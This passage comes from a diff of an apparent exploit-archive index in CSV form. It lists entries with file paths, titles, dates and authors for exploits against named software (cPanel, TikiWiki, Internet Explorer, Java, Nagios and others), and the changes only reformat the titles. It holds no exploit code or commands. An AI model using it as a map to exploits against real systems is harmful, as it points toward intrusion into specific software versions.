Vulnerabilities",2004-03-05,"Rafel Ivgi The-Insider",php,webapps,0 @@ -21013,7 +21013,7 @@ id,file,description,date,author,platform,type,port 23804,platforms/cgi/remote/23804.txt,"cPanel 5/6/7/8/9 Resetpass Remote Command Execution",2004-03-11,"Arab VieruZ",cgi,remote,0 23805,platforms/multiple/dos/23805.txt,"Targem Games Battle Mages 1.0 - Remote Denial of Service",2004-03-11,"Luigi Auriemma",multiple,dos,0 23806,platforms/cgi/webapps/23806.txt,"cPanel 5/6/7/8/9 dir Parameter Cross-Site Scripting",2004-03-12,Fable,cgi,webapps,0 -23807,platforms/cgi/webapps/23807.txt,"cPanel 5/6/7/8/9 Login Script Remote Command Execution",2004-03-12,"Arab VieruZ",cgi,webapps,0 +23807,platforms/cgi/webapps/23807.txt,"cPanel 5/6/7/8/9 - Login Script Remote Command Execution",2004-03-12,"Arab VieruZ",cgi,webapps,0 23808,platforms/hardware/remote/23808.txt,"IP3 Networks IP3 NetAccess Appliance SQL Injection",2004-03-12,"Syam Yanuar",hardware,remote,0 23809,platforms/cgi/webapps/23809.txt,"Emumail EMU Webmail 5.2.7 nit.emu Information Disclosure",2004-03-12,dr_insane,cgi,webapps,0 23810,platforms/cgi/webapps/23810.txt,"Emumail EMU Webmail 5.2.7 emumail.fcgi Multiple Parameter XSS",2004-03-12,dr_insane,cgi,webapps,0 @@ -21080,17 +21080,17 @@ id,file,description,date,author,platform,type,port 23874,platforms/solaris/local/23874.txt,"Sun Solaris 2.6/7.0/8/9 - vfs_getvfssw function Local Privilege Escalation",2004-03-23,"Sinan Eren",solaris,local,0 23875,platforms/windows/remote/23875.txt,"Trend Micro Interscan Viruswall localweb - Directory Traversal",2004-03-24,"Tri Huynh",windows,remote,0 23876,platforms/hardware/dos/23876.txt,"PicoPhone Internet Phone 1.63 - Remote Buffer Overflow",2004-03-24,"Luigi Auriemma",hardware,dos,0 -23879,platforms/windows/remote/23879.txt,"HP Web Jetadmin 7.5.2456 setinfo.hts Script Directory Traversal",2004-03-24,wirepair,windows,remote,0 +23879,platforms/windows/remote/23879.txt,"HP Web Jetadmin 7.5.2456 - setinfo.hts Script Directory Traversal",2004-03-24,wirepair,windows,remote,0 23880,platforms/windows/remote/23880.txt,"HP Web Jetadmin 7.5.2456 - Remote Arbitrary Command Execution",2004-03-24,wirepair,windows,remote,0 23881,platforms/linux/remote/23881.txt,"Emil 2.x - Multiple Buffer Overrun and Format String Vulnerabilities",2004-03-25,"Ulf Harnhammar",linux,remote,0 23882,platforms/linux/local/23882.pas,"NetSupport School 7.0/7.5 Weak Password Encryption",2004-03-26,"spiffomatic 64",linux,local,0 -23883,platforms/aix/local/23883.pl,"AIX 4.3.3/5.1 Invscoutd Symbolic Link",2003-05-29,watercloud,aix,local,0 +23883,platforms/aix/local/23883.pl,"AIX 4.3.3/5.1 - Invscoutd Symbolic Link",2003-05-29,watercloud,aix,local,0 23884,platforms/linux/dos/23884.txt,"NSTX 1.0/1.1 - Remote Denial of Service",2004-03-26,"laurent oudot",linux,dos,0 23885,platforms/php/webapps/23885.txt,"PhotoPost PHP Pro 3.x/4.x - showgallery.php Multiple Parameter SQL Injection",2004-03-29,JeiAr,php,webapps,0 23886,platforms/windows/webapps/23886.txt,"simple webserver 2.3-rc1 - Directory Traversal",2013-01-04,"CwG GeNiuS",windows,webapps,0 -23887,platforms/windows/remote/23887.rb,"Enterasys NetSight nssyslogd.exe Buffer Overflow",2013-01-04,Metasploit,windows,remote,0 +23887,platforms/windows/remote/23887.rb,"Enterasys NetSight - nssyslogd.exe Buffer Overflow",2013-01-04,Metasploit,windows,remote,0 23888,platforms/php/webapps/23888.txt,"MyBB Profile Wii Friend Code - Multiple Vulnerabilities",2013-01-04,Ichi,php,webapps,0 -23969,platforms/windows/remote/23969.rb,"IBM Cognos tm1admsd.exe Overflow",2013-01-08,Metasploit,windows,remote,0 +23969,platforms/windows/remote/23969.rb,"IBM Cognos - tm1admsd.exe Overflow",2013-01-08,Metasploit,windows,remote,0 23890,platforms/cgi/webapps/23890.txt,"Fresh Guest Book 1.0/2.x - HTML Injection",2004-03-29,"koi8-r Shelz",cgi,webapps,0 23891,platforms/asp/webapps/23891.txt,"Alan Ward A-Cart 2.0 - category.asp catcode Parameter SQL Injection",2004-03-29,"Manuel Lopez",asp,webapps,0 23892,platforms/linux/local/23892.c,"Systrace 1.x - Local Policy Bypass",2004-03-29,Brad,linux,local,0 @@ -21116,9 +21116,9 @@ id,file,description,date,author,platform,type,port 23913,platforms/cgi/webapps/23913.txt,"Floosietek FTGate Mail Server 1.2 - index.fts folder Parameter XSS",2004-04-06,dr_insane,cgi,webapps,0 23914,platforms/cgi/webapps/23914.txt,"Floosietek FTGate Mail Server 1.2 - Path Disclosure",2004-04-06,dr_insane,cgi,webapps,0 23915,platforms/windows/dos/23915.txt,"Adobe Photoshop 8.0 - COM Objects Denial of Service",2004-04-06,"Rafel Ivgi The-Insider",windows,dos,0 -23916,platforms/windows/dos/23916.txt,"Blaxxun Contact 3D X-CC3D Browser Object Buffer Overflow",2004-04-06,"Rafel Ivgi The-Insider",windows,dos,0 -23917,platforms/windows/dos/23917.txt,"Panda ActiveScan 5.0 ASControl.DLL Remote Heap Overflow",2004-04-06,"Rafel Ivgi The-Insider",windows,dos,0 -23918,platforms/windows/dos/23918.txt,"Panda ActiveScan 5.0 ascontrol.dll Denial of Service",2004-04-06,"Rafel Ivgi The-Insider",windows,dos,0 +23916,platforms/windows/dos/23916.txt,"Blaxxun Contact 3D - X-CC3D Browser Object Buffer Overflow",2004-04-06,"Rafel Ivgi The-Insider",windows,dos,0 +23917,platforms/windows/dos/23917.txt,"Panda ActiveScan 5.0 - ASControl.DLL Remote Heap Overflow",2004-04-06,"Rafel Ivgi The-Insider",windows,dos,0 +23918,platforms/windows/dos/23918.txt,"Panda ActiveScan 5.0 - ascontrol.dll Denial of Service",2004-04-06,"Rafel Ivgi The-Insider",windows,dos,0 23919,platforms/windows/dos/23919.txt,"Symantec Security Check Virus Detection COM Object Denial of Service",2004-04-07,"Rafel Ivgi The-Insider",windows,dos,0 23920,platforms/windows/dos/23920.txt,"Mcafee FreeScan CoMcFreeScan Browser Object Buffer Overflow",2004-04-07,"Rafel Ivgi The-Insider",windows,dos,0 23921,platforms/windows/local/23921.c,"Centrinity FirstClass Desktop Client 7.1 - Local Buffer Overflow",2004-04-07,I2S-LaB,windows,local,0 @@ -21143,7 +21143,7 @@ id,file,description,date,author,platform,type,port 23941,platforms/cgi/webapps/23941.txt,"1st Class Mail Server 4.0 1 - advanced.tagz XSS",2004-04-08,dr_insane,cgi,webapps,0 23942,platforms/cgi/webapps/23942.txt,"1st Class Mail Server 4.0 1 - list.tagz XSS",2004-04-08,dr_insane,cgi,webapps,0 23943,platforms/linux/dos/23943.txt,"Crackalaka IRC Server 1.0.8 - Remote Denial of Service",2004-04-09,"Donato Ferrante",linux,dos,0 -23944,platforms/windows/dos/23944.php,"Foxit Reader 5.4.4.1128 Firefox Plugin npFoxitReaderPlugin.dll Stack Buffer Overflow",2013-01-07,rgod,windows,dos,0 +23944,platforms/windows/dos/23944.php,"Foxit Reader 5.4.4.1128 Firefox Plugin - npFoxitReaderPlugin.dll Stack Buffer Overflow",2013-01-07,rgod,windows,dos,0 23945,platforms/unix/dos/23945.txt,"Ettercap 0.7.5.1 - Stack Overflow",2013-01-07,"Sajjad Pourali",unix,dos,0 23946,platforms/linux/dos/23946.c,"Linux Kernel 2.4 / 2.6 - Sigqueue Blocking Denial of Service",2004-04-12,"Nikita V. Youshchenko",linux,dos,0 23947,platforms/php/webapps/23947.txt,"TikiWiki Project 1.8 - tiki-switch_theme.php theme Parameter XSS",2004-04-12,JeiAr,php,webapps,0 @@ -21166,8 +21166,8 @@ id,file,description,date,author,platform,type,port 23964,platforms/php/webapps/23964.txt,"TikiWiki Project 1.8 - tiki-list_file_gallery.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0 23965,platforms/php/webapps/23965.txt,"TikiWiki Project 1.8 - tiki-directory_ranking.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0 23966,platforms/php/webapps/23966.txt,"TikiWiki Project 1.8 - tiki-browse_categories.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0 -23967,platforms/php/webapps/23967.txt,"E Sms Script Multiple SQL Injection",2013-01-08,"cr4wl3r ",php,webapps,0 -23968,platforms/asp/webapps/23968.txt,"Advantech WebAccess HMI/SCADA Software Persistence XSS",2013-01-08,"SecPod Research",asp,webapps,0 +23967,platforms/php/webapps/23967.txt,"E Sms Script - Multiple SQL Injection",2013-01-08,"cr4wl3r ",php,webapps,0 +23968,platforms/asp/webapps/23968.txt,"Advantech WebAccess HMI/SCADA Software - Persistence XSS",2013-01-08,"SecPod Research",asp,webapps,0 23970,platforms/php/webapps/23970.rb,"WordPress Plugin Google Document Embedder - Arbitrary File Disclosure",2013-01-08,Metasploit,php,webapps,0 23971,platforms/php/webapps/23971.txt,"TikiWiki Project 1.8 - tiki-index.php comments_offset & offset Parameter SQL Injections",2004-04-12,JeiAr,php,webapps,0 23972,platforms/php/webapps/23972.txt,"TikiWiki Project 1.8 - tiki-user_tasks.php offset & sort_mode Parameter SQL Injections",2004-04-12,JeiAr,php,webapps,0 @@ -21216,7 +21216,7 @@ id,file,description,date,author,platform,type,port 24018,platforms/php/remote/24018.rb,"eXtplorer 2.1 - Arbitrary File Upload",2013-01-10,Metasploit,php,remote,0 24019,platforms/multiple/remote/24019.rb,"Ruby on Rails XML Processor YAML Deserialization Code Execution",2013-01-10,Metasploit,multiple,remote,0 24020,platforms/windows/remote/24020.rb,"Microsoft Internet Explorer - Option Element Use-After-Free",2013-01-10,Metasploit,windows,remote,0 -24021,platforms/windows/remote/24021.rb,"Honeywell Tema Remote Installer ActiveX Remote Code Execution",2013-01-10,Metasploit,windows,remote,0 +24021,platforms/windows/remote/24021.rb,"Honeywell Tema Remote Installer - ActiveX Remote Code Execution",2013-01-10,Metasploit,windows,remote,0 24022,platforms/windows/dos/24022.txt,"Nero MediaHome 4.5.8.0 - Denial of Service",2013-01-10,"High-Tech Bridge SA",windows,dos,0 24023,platforms/hardware/dos/24023.py,"Colloquy 1.3.5 / 1.3.6 - Denial of Service",2013-01-10,UberLame,hardware,dos,0 24024,platforms/windows/remote/24024.html,"Softwin BitDefender AvxScanOnlineCtrl COM Object Remote File Upload And Execution",2004-04-19,"Rafel Ivgi The-Insider",windows,remote,0 @@ -21237,7 +21237,7 @@ id,file,description,date,author,platform,type,port 24039,platforms/asp/webapps/24039.txt,"NewsTraXor Website Management Script 2.9 beta - Database Disclosure",2004-04-22,CyberTal0n,asp,webapps,0 24040,platforms/multiple/remote/24040.txt,"PISG 0.54 IRC Nick HTML Injection",2004-04-22,shr3kst3r,multiple,remote,0 24041,platforms/multiple/remote/24041.c,"Epic Games Unreal Tournament Engine 3 - UMOD Manifest.INI Remote Arbitrary File Overwrite",2004-04-22,"Luigi Auriemma",multiple,remote,0 -24042,platforms/windows/dos/24042.txt,"Yahoo! Messenger 5.6 YInsthelper.DLL Multiple Buffer Overflow Vulnerabilities",2004-04-23,"Rafel Ivgi The-Insider",windows,dos,0 +24042,platforms/windows/dos/24042.txt,"Yahoo! Messenger 5.6 - YInsthelper.DLL Multiple Buffer Overflow Vulnerabilities",2004-04-23,"Rafel Ivgi The-Insider",windows,dos,0 24043,platforms/linux/local/24043.c,"Linux Kernel 2.5.x / 2.6.x - CPUFreq Proc Handler Integer Handling Memory Read",2004-04-23,"Brad Spengler",linux,local,0 24044,platforms/php/webapps/24044.txt,"phpLiteAdmin 1.9.3 - Remote PHP Code Injection",2013-01-11,L@usch,php,webapps,0 24045,platforms/java/remote/24045.rb,"Java Applet JMX - Remote Code Execution (1)",2013-01-11,Metasploit,java,remote,0 @@ -21350,7 +21350,7 @@ id,file,description,date,author,platform,type,port 24189,platforms/multiple/remote/24189.html,"Microsoft Internet Explorer 5.0.1_ Opera 7.51 - URI Obfuscation Weakness",2004-06-10,http-equiv,multiple,remote,0 24157,platforms/php/webapps/24157.txt,"Cydia Repo Manager CSRF",2013-01-16,"Ramdan Yantu",php,webapps,0 24158,platforms/jsp/webapps/24158.txt,"Oracle Application Framework Diagnostic Mode Bypass",2013-01-16,"Trustwave's SpiderLabs",jsp,webapps,0 -24159,platforms/linux/remote/24159.rb,"Nagios3 history.cgi Host Command Execution",2013-01-16,Metasploit,linux,remote,0 +24159,platforms/linux/remote/24159.rb,"Nagios3 - history.cgi Host Command Execution",2013-01-16,Metasploit,linux,remote,0 24160,platforms/linux/remote/24160.txt,"SquirrelMail 1.x - Email Header HTML Injection",2004-05-31,"Roman Medina",linux,remote,0 24161,platforms/windows/remote/24161.txt,"Sambar Server 6.1 beta 2 - show.asp show Parameter XSS",2004-06-01,"Oliver Karow",windows,remote,0 24162,platforms/windows/remote/24162.txt,"Sambar Server 6.1 beta 2 - showperf.asp title Parameter XSS",2004-06-01,"Oliver Karow",windows,remote,0 @@ -21359,11 +21359,11 @@ id,file,description,date,author,platform,type,port 24165,platforms/linux/remote/24165.pl,"Firebird 1.0 - Remote Pre-Authentication Database Name Buffer Overrun",2004-06-01,wsxz,linux,remote,0 24166,platforms/php/webapps/24166.txt,"PHP-Nuke 5.x/6.x/7.x - Direct Script Access Security Bypass",2004-06-01,Squid,php,webapps,0 24167,platforms/php/webapps/24167.txt,"SquirrelMail 1.2.x - From Email Header HTML Injection",2004-06-03,anonymous,php,webapps,0 -24168,platforms/php/webapps/24168.txt,"Mail Manage EX 3.1.8 MMEX Script Settings Parameter Remote PHP File Include",2004-06-03,"The Warlock [BhQ]",php,webapps,0 +24168,platforms/php/webapps/24168.txt,"Mail Manage EX 3.1.8 MMEX - Script Settings Parameter Remote PHP File Include",2004-06-03,"The Warlock [BhQ]",php,webapps,0 24169,platforms/php/webapps/24169.txt,"Crafty Syntax Live Help 2.7.3 - Multiple HTML Injection Vulnerabilities",2004-06-04,"HNK Technology Solutions",php,webapps,0 24170,platforms/multiple/dos/24170.txt,"Colin McRae Rally 2004 Multiplayer Denial of Service",2004-06-04,"Luigi Auriemma",multiple,dos,0 24171,platforms/windows/local/24171.c,"SmartStuff FoolProof Security Program 3.9.x - Administrative Password Recovery",2004-06-05,"Cyrillium Security",windows,local,0 -24172,platforms/php/webapps/24172.txt,"cPanel 5-9 Killacct Script Customer Account DNS Information Deletion",2004-06-05,"qbann targ",php,webapps,0 +24172,platforms/php/webapps/24172.txt,"cPanel 5-9 - Killacct Script Customer Account DNS Information Deletion",2004-06-05,"qbann targ",php,webapps,0 24173,platforms/php/local/24173.txt,"PHP 4.3.x - Microsoft Windows Shell Escape Functions Command Execution",2004-06-07,"Daniel Fabian",php,local,0 24174,platforms/windows/remote/24174.txt,"Microsoft Internet Explorer 6.0 URL Local Resource Access Weakness",2004-06-06,"Rafel Ivgi The-Insider",windows,remote,0 24175,platforms/cgi/webapps/24175.txt,"Linksys Web Camera Software 2.10 Next_file Parameter File Disclosure",2004-06-07,"John Doe",cgi,webapps,0 @@ -21388,7 +21388,7 @@ id,file,description,date,author,platform,type,port 24198,platforms/asp/webapps/24198.txt,"Virtual Programming VP-ASP Shoperror Script 4/5 - Cross-Site Scripting",2004-06-14,"Thomas Ryan",asp,webapps,0 24199,platforms/php/webapps/24199.txt,"Invision Power Board 1.3 SSI.php Cross-Site Scripting",2004-06-14,"IMAN Sharafoddin",php,webapps,0 24200,platforms/windows/local/24200.txt,"Sygate Personal Firewall Pro 5.5 - Local Fail-Close Bypass",2004-06-14,"Tan Chew Keong",windows,local,0 -24201,platforms/php/webapps/24201.txt,"php-Charts Arbitrary PHP Code Execution",2013-01-18,AkaStep,php,webapps,0 +24201,platforms/php/webapps/24201.txt,"php-Charts - Arbitrary PHP Code Execution",2013-01-18,AkaStep,php,webapps,0 24202,platforms/hardware/webapps/24202.txt,"linksys wrt54gl firmware 4.30.15 build 2 - Multiple Vulnerabilities",2013-01-18,m-1-k-3,hardware,webapps,0 24203,platforms/multiple/webapps/24203.txt,"SonicWALL GMS/Viewpoint/Analyzer Authentication Bypass",2013-01-18,"Nikolas Sotiriu",multiple,webapps,0 24204,platforms/multiple/webapps/24204.pl,"SonicWALL GMS/VIEWPOINT 6.x Analyzer 7.x - Remote Root/SYSTEM Exploit",2013-01-18,"Nikolas Sotiriu",multiple,webapps,0 @@ -21423,12 +21423,12 @@ id,file,description,date,author,platform,type,port 24233,platforms/freebsd/dos/24233.c,"FreeBSD 4.10/5.x - execve() Unaligned Memory Access Denial of Service",2004-06-23,"Marceta Milos",freebsd,dos,0 24234,platforms/php/webapps/24234.html,"VBulletin 3.0.1 newreply.php WYSIWYG_HTML Parameter XSS",2004-06-24,"Cheng Peng Su",php,webapps,0 24235,platforms/php/webapps/24235.txt,"ZaireWeb Solutions Newsletter ZWS Administrative Interface Authentication Bypass",2004-06-24,GaMeS,php,webapps,0 -24236,platforms/cgi/webapps/24236.txt,"McMurtrey/Whitaker & Associates Cart32 2-5 GetLatestBuilds Script Cross-Site Scripting",2004-06-28,"Dr.Ponidi Haryanto",cgi,webapps,0 -24237,platforms/cgi/webapps/24237.txt,"CGIScript.net CSFAQ 1.0 Script Path Disclosure",2004-06-28,DarkBicho,cgi,webapps,0 -24238,platforms/php/webapps/24238.txt,"CuteNews 0.88/1.3 example1.php id Parameter XSS",2004-06-28,DarkBicho,php,webapps,0 -24239,platforms/php/webapps/24239.txt,"CuteNews 0.88/1.3 example2.php id Parameter XSS",2004-06-28,DarkBicho,php,webapps,0 +24236,platforms/cgi/webapps/24236.txt,"McMurtrey/Whitaker & Associates Cart32 2-5 GetLatestBuilds Script - Cross-Site Scripting",2004-06-28,"Dr.Ponidi Haryanto",cgi,webapps,0 +24237,platforms/cgi/webapps/24237.txt,"CGIScript.net CSFAQ 1.0 Script - Path Disclosure",2004-06-28,DarkBicho,cgi,webapps,0 +24238,platforms/php/webapps/24238.txt,"CuteNews 0.88/1.3 - example1.php id Parameter XSS",2004-06-28,DarkBicho,php,webapps,0 +24239,platforms/php/webapps/24239.txt,"CuteNews 0.88/1.3 - example2.php id Parameter XSS",2004-06-28,DarkBicho,php,webapps,0 24240,platforms/php/webapps/24240.txt,"CuteNews 0.88/1.3 show_archives.php id Parameter XSS",2004-06-28,DarkBicho,php,webapps,0 -24241,platforms/php/webapps/24241.txt,"PowerPortal 1.1/1.3 modules.php Traversal Arbitrary Directory Listing",2004-06-28,DarkBicho,php,webapps,0 +24241,platforms/php/webapps/24241.txt,"PowerPortal 1.1/1.3 modules.php Traversal - Arbitrary Directory Listing",2004-06-28,DarkBicho,php,webapps,0 24242,platforms/multiple/dos/24242.java,"Sun Java Runtime Environment 1.4.x - Font Object Assertion Failure Denial of Service",2004-06-28,"Marc Schoenefeld",multiple,dos,0 24243,platforms/unix/dos/24243.txt,"IBM Lotus Domino Server 6 - Web Access Remote Denial of Service",2004-06-30,"Andreas Klein",unix,dos,0 24244,platforms/cgi/webapps/24244.txt,"Netegrity IdentityMinder Web Edition 5.6 Null Byte XSS",2004-07-01,vuln@hexview.com,cgi,webapps,0 @@ -21475,19 +21475,19 @@ id,file,description,date,author,platform,type,port 24285,platforms/cgi/webapps/24285.txt,"Gattaca Server 2003 - Language Variable Path Exposure",2004-07-15,dr_insane,cgi,webapps,0 24286,platforms/cgi/webapps/24286.txt,"Gattaca Server 2003 - Cross-Site Scripting",2004-07-15,dr_insane,cgi,webapps,0 24287,platforms/cgi/webapps/24287.txt,"BoardPower Forum ICQ.CGI Cross-Site Scripting",2004-07-15,"Alexander Antipov",cgi,webapps,0 -24288,platforms/windows/dos/24288.txt,"Symantec Norton Antivirus 2001/2002/2003/2004 Script Blocker Denial of Service",2004-07-16,vozzie,windows,dos,0 -24289,platforms/php/webapps/24289.c,"Artmedic Webdesign Kleinanzeigen Script File Include",2004-07-19,"Adam Simuntis",php,webapps,0 +24288,platforms/windows/dos/24288.txt,"Symantec Norton Antivirus 2001/2002/2003/2004 - Script Blocker Denial of Service",2004-07-16,vozzie,windows,dos,0 +24289,platforms/php/webapps/24289.c,"Artmedic Webdesign Kleinanzeigen Script - File Include",2004-07-19,"Adam Simuntis",php,webapps,0 24290,platforms/php/webapps/24290.txt,"CuteNews 1.3 - Comment HTML Injection",2004-07-19,DarkBicho,php,webapps,0 24291,platforms/php/webapps/24291.txt,"Outblaze Webmail - HTML Injection",2004-07-19,DarkBicho,php,webapps,0 24292,platforms/php/webapps/24292.txt,"Adam Ismay Print Topic Mod 1.0 - SQL Injection",2004-07-19,"Bartek Nowotarski",php,webapps,0 24293,platforms/sco/local/24293.c,"SCO Multi-channel Memorandum Distribution Facility - Multiple Vulnerabilities",2004-07-20,"Ramon Valle",sco,local,0 24294,platforms/php/webapps/24294.txt,"WordPress Developer Formatter Plugin - CSRF",2013-01-22,"Junaid Hussain",php,webapps,0 -24295,platforms/php/webapps/24295.txt,"Adult Webmaster Script Password Disclosure",2013-01-22,"Dshellnoi Unix",php,webapps,0 +24295,platforms/php/webapps/24295.txt,"Adult Webmaster Script - Password Disclosure",2013-01-22,"Dshellnoi Unix",php,webapps,0 24356,platforms/php/webapps/24356.txt,"Moodle 1.x - 'post.php' Cross-Site Scripting",2004-08-16,"Javier Ubilla",php,webapps,0 24296,platforms/php/webapps/24296.txt,"Nucleus CMS 3.0_Blog:CMS 3_PunBB 1.x - Common.php Remote File Inclusion",2004-07-20,"Radek Hulan",php,webapps,0 24297,platforms/windows/remote/24297.pl,"Serena TeamTrack 6.1.1 - Remote Authentication Bypass",2004-07-21,"Noam Rathaus",windows,remote,0 24298,platforms/asp/webapps/24298.pl,"Internet Software Sciences Web+Center 4.0.1 - Cookie Object SQL Injection",2004-07-21,"Noam Rathaus",asp,webapps,0 -24299,platforms/asp/webapps/24299.pl,"NetSupport DNA HelpDesk 1.0 Problist Script SQL Injection",2004-07-21,"Noam Rathaus",asp,webapps,0 +24299,platforms/asp/webapps/24299.pl,"NetSupport DNA HelpDesk 1.0 Problist Script - SQL Injection",2004-07-21,"Noam Rathaus",asp,webapps,0 24300,platforms/asp/webapps/24300.pl,"Leigh Business Enterprises Web HelpDesk 4.0 - SQL Injection",2004-07-21,"Noam Rathaus",asp,webapps,0 24301,platforms/php/webapps/24301.html,"Mensajeitor Tag Board 1.x - Authentication Bypass",2004-07-21,"Jordi Corrales",php,webapps,0 24302,platforms/asp/webapps/24302.pl,"Polar Helpdesk 3.0 Cookie Based Authentication System Bypass",2004-07-21,"Noam Rathaus",asp,webapps,0 @@ -21495,10 +21495,10 @@ id,file,description,date,author,platform,type,port 24304,platforms/windows/remote/24304.txt,"Imatix Xitami 2.5 Server Side Includes Cross-Site Scripting",2004-07-22,"Oliver Karow",windows,remote,0 24305,platforms/multiple/dos/24305.txt,"PSCS VPOP3 2.0 - Email Server Remote Denial of Service",2004-07-22,dr_insane,multiple,dos,0 24306,platforms/php/webapps/24306.txt,"EasyWeb 1.0 FileManager Module - Directory Traversal",2004-07-23,sullo@cirt.net,php,webapps,0 -24307,platforms/php/webapps/24307.txt,"PostNuke 0.7x Install Script Administrator Password Disclosure",2004-07-24,hellsink,php,webapps,0 +24307,platforms/php/webapps/24307.txt,"PostNuke 0.7x - Install Script Administrator Password Disclosure",2004-07-24,hellsink,php,webapps,0 24308,platforms/multiple/remote/24308.rb,"Java Applet Method Handle Remote Code Execution",2013-01-24,Metasploit,multiple,remote,0 24309,platforms/java/remote/24309.rb,"Java Applet AverageRangeStatisticImpl Remote Code Execution",2013-01-24,Metasploit,java,remote,0 -24310,platforms/unix/remote/24310.rb,"ZoneMinder Video Server packageControl Command Execution",2013-01-24,Metasploit,unix,remote,0 +24310,platforms/unix/remote/24310.rb,"ZoneMinder Video Server - packageControl Command Execution",2013-01-24,Metasploit,unix,remote,0 24311,platforms/php/webapps/24311.txt,"EasyIns Stadtportal 4.0 - Site Parameter Remote File Inclusion",2004-07-24,"Francisco Alisson",php,webapps,0 24312,platforms/linux/remote/24312.html,"Mozilla Browser 0.8/0.9/1.x - Refresh Security Property Spoofing",2004-07-26,E.Kellinis,linux,remote,0 24313,platforms/asp/webapps/24313.txt,"XLineSoft ASPRunner 1.0/2.x - [TABLE-NAME]_search.asp Typeen Parameter XSS",2004-07-26,"Ferruh Mavituna",asp,webapps,0 @@ -21517,8 +21517,8 @@ id,file,description,date,author,platform,type,port 24326,platforms/cgi/remote/24326.txt,"RiSearch 0.99 - /RiSearch Pro 3.2.6 show.pl Open Proxy Relay",2004-07-27,"Phil Robinson",cgi,remote,0 24327,platforms/cgi/remote/24327.txt,"RiSearch 0.99 - /RiSearch Pro 3.2.6 show.pl Arbitrary File Access",2004-07-27,"Phil Robinson",cgi,remote,0 24328,platforms/windows/remote/24328.txt,"Microsoft Internet Explorer 5.0.1 Style Tag Comment Memory Corruption",2004-07-08,"Phuong Nguyen",windows,remote,0 -24329,platforms/php/webapps/24329.txt,"AntiBoard 0.6/0.7 antiboard.php Multiple Parameter SQL Injection",2004-07-28,"Josh Gilmour",php,webapps,0 -24330,platforms/php/webapps/24330.txt,"AntiBoard 0.6/0.7 antiboard.php feedback Parameter XSS",2004-07-28,"Josh Gilmour",php,webapps,0 +24329,platforms/php/webapps/24329.txt,"AntiBoard 0.6/0.7 - antiboard.php Multiple Parameter SQL Injection",2004-07-28,"Josh Gilmour",php,webapps,0 +24330,platforms/php/webapps/24330.txt,"AntiBoard 0.6/0.7 - antiboard.php feedback Parameter XSS",2004-07-28,"Josh Gilmour",php,webapps,0 24331,platforms/php/webapps/24331.txt,"Phorum 5.0.7 - Search Script Cross-Site Scripting",2004-07-28,vampz,php,webapps,0 24332,platforms/php/webapps/24332.txt,"Comersus Cart 5.0 - SQL Injection",2004-07-29,evol@ruiner.halo.nu,php,webapps,0 24333,platforms/php/webapps/24333.txt,"Verylost LostBook 1.1 Message Entry HTML Injection",2004-07-29,"Joseph Moniz",php,webapps,0 @@ -21605,7 +21605,7 @@ id,file,description,date,author,platform,type,port 24416,platforms/windows/dos/24416.txt,"Ipswitch WS_FTP Server 5.0.x - CD Command Malformed File Path Remote Denial of Service",2004-08-30,lion,windows,dos,0 24417,platforms/windows/remote/24417.txt,"Xedus Web Server 1.0 - test.x username Parameter XSS",2004-09-30,"James Bercegay",windows,remote,0 24418,platforms/windows/remote/24418.txt,"Xedus Web Server 1.0 - testgetrequest.x username Parameter XSS",2004-09-30,"James Bercegay",windows,remote,0 -24419,platforms/windows/remote/24419.txt,"Xedus Web Server 1.0 Traversal Arbitrary File Access",2004-09-30,"James Bercegay",windows,remote,0 +24419,platforms/windows/remote/24419.txt,"Xedus Web Server 1.0 Traversal - Arbitrary File Access",2004-09-30,"James Bercegay",windows,remote,0 24420,platforms/asp/webapps/24420.txt,"Web Animations Password Protect Multiple Input Validation Vulnerabilities",2004-08-31,Criolabs,asp,webapps,0 24421,platforms/linux/local/24421.c,"Debian bsdmainutils 6.0.14 Calendar Information Disclosure",2004-08-31,"Steven Van Acker",linux,local,0 24422,platforms/asp/webapps/24422.txt,"Comersus Cart 5.0 HTTP Response Splitting",2004-09-01,"Maestro De-Seguridad",asp,webapps,0 @@ -21626,7 +21626,7 @@ id,file,description,date,author,platform,type,port 24439,platforms/freebsd/webapps/24439.txt,"PFsense UTM Platform 2.0.1 - XSS",2013-01-29,"Dimitris Strevinas",freebsd,webapps,0 24442,platforms/hardware/webapps/24442.txt,"D-Link DCS Cameras - Multiple Vulnerabilities",2013-01-31,"Roberto Paleari",hardware,webapps,0 24443,platforms/hardware/webapps/24443.txt,"Buffalo TeraStation TS-Series - Multiple Vulnerabilities",2013-01-31,"Andrea Fabrizi",hardware,webapps,0 -24444,platforms/php/remote/24444.rb,"DataLife Engine preview.php PHP Code Injection",2013-02-01,Metasploit,php,remote,0 +24444,platforms/php/remote/24444.rb,"DataLife Engine - preview.php PHP Code Injection",2013-02-01,Metasploit,php,remote,0 24445,platforms/php/webapps/24445.txt,"Simple Machine Forum 2.0.x - < 2.0.4 File Disclosure/Path Traversal",2013-02-04,NightlyDev,php,webapps,0 24448,platforms/windows/dos/24448.svg,"Opera SVG - Use-After-Free",2013-02-05,Cons0ul,windows,dos,0 24449,platforms/jsp/webapps/24449.txt,"Cisco Unity Express - Multiple Vulnerabilities",2013-02-05,"Jacob Holcomb",jsp,webapps,0 @@ -21667,7 +21667,7 @@ id,file,description,date,author,platform,type,port 24487,platforms/linux/dos/24487.py,"cURL Buffer Overflow",2013-02-11,Volema,linux,dos,0 24520,platforms/php/webapps/24520.txt,"Piwigo 2.4.6 - (install.php) Remote Arbitrary File Read/Delete",2013-02-19,LiquidWorm,php,webapps,0 24509,platforms/php/webapps/24509.txt,"Scripts Genie Games Site Script - (index.php id param) SQL Injection",2013-02-17,3spi0n,php,webapps,0 -24490,platforms/windows/remote/24490.rb,"Novell GroupWise Client gwcls1.dll ActiveX Remote Code Execution",2013-02-12,Metasploit,windows,remote,0 +24490,platforms/windows/remote/24490.rb,"Novell GroupWise Client - gwcls1.dll ActiveX Remote Code Execution",2013-02-12,Metasploit,windows,remote,0 24494,platforms/hardware/remote/24494.rb,"Polycom HDX - Telnet Authorization Bypass (Metasploit)",2013-02-14,"Paul Haas",hardware,remote,23 24492,platforms/php/webapps/24492.php,"OpenEMR 4.1.1 - (ofc_upload_image.php) Arbitrary File Upload",2013-02-13,LiquidWorm,php,webapps,0 24495,platforms/windows/remote/24495.rb,"Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) (Metasploit)",2013-02-14,"Scott Bell",windows,remote,0 @@ -21696,7 +21696,7 @@ id,file,description,date,author,platform,type,port 24529,platforms/php/remote/24529.rb,"OpenEMR - PHP File 